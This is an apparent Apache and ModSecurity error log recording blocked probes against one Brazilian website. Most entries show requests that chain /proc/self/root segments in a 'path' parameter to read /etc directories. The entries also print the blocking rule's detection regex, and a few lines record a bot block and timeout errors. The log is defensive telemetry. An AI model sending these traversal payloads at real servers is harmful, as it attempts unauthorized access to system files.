[Tue Mar 17 19:36:09.550567 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:39278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXWYh-PF_25v4hFRCJkAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:36:12.262643 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:39288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXXBj0p0SRWAqcjGGY7wAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:36:28.129778 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38534] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:36:42.130813 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.244.43:43774] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnXehj0p0SRWAqcjGGY9AAAAwg"]
[Tue Mar 17 19:36:42.864855 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.228.61:37278] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnXeoh-PF_25v4hFRCJmQAAAQU"]
[Tue Mar 17 19:36:45.076226 2026] [:error] [pid 11816:tid 140411733534464] [client 216.73.216.191:22921] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXfew_le52K8_3pV1s0gAAAgE"]
[Tue Mar 17 19:36:50.120315 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38924] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:37:12.125912 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:37:16.450338 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:39292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXnHIk7brgkOH-rIWsRQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:17.198772 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:42700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXneyqAr6etmhZHNpHCQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:22.263469 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:42348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXotY0UrI5A3LftIweZwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:34.122542 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39586] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:37:36.145598 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:40668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXsNa6ubjKNq_cu4YmvAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:38.344287 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:53032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXssU6Sx0TG1YjmQjOgQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:39.975850 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:53040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXs3Ik7brgkOH-rIWsTAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:41.586779 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:53054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXteyqAr6etmhZHNpHCwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:42.059508 2026] [:error] [pid 29151:tid 140411666392832] [client 216.73.216.191:14180] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXtvPqhzTj3BvfDX-nLgAAAck"]
[Tue Mar 17 19:37:43.557961 2026] [:error] [pid 11088:tid 140411565680384] [client 74.7.241.31:53064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXt2mqtCojLHvu5cKJBQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:55.121654 2026] [proxy_fcgi:error] [pid 11088:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:37:56.523081 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:53046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXxNa6ubjKNq_cu4YmwAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:37:58.630742 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:54336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXxtY0UrI5A3LftIwedgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:00.089390 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:54344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXyNY0UrI5A3LftIweeQAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:01.737080 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:54346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXyeyqAr6etmhZHNpHEQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:03.299481 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:54356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXy-w_le52K8_3pV1s5QAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:04.831308 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.241.31:54364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXzMU6Sx0TG1YjmQjOiAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:05.721800 2026] [:error] [pid 29151:tid 140411624429312] [client 216.73.216.191:28217] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXzfPqhzTj3BvfDX-nMQAAAc4"]
[Tue Mar 17 19:38:06.293974 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:54366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXzuw_le52K8_3pV1s5wAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:17.121832 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40358] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:38:17.793948 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:38124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX2Rj0p0SRWAqcjGGZBgAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:19.990411 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:38140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX2-w_le52K8_3pV1s6gAAAgg"], referer: 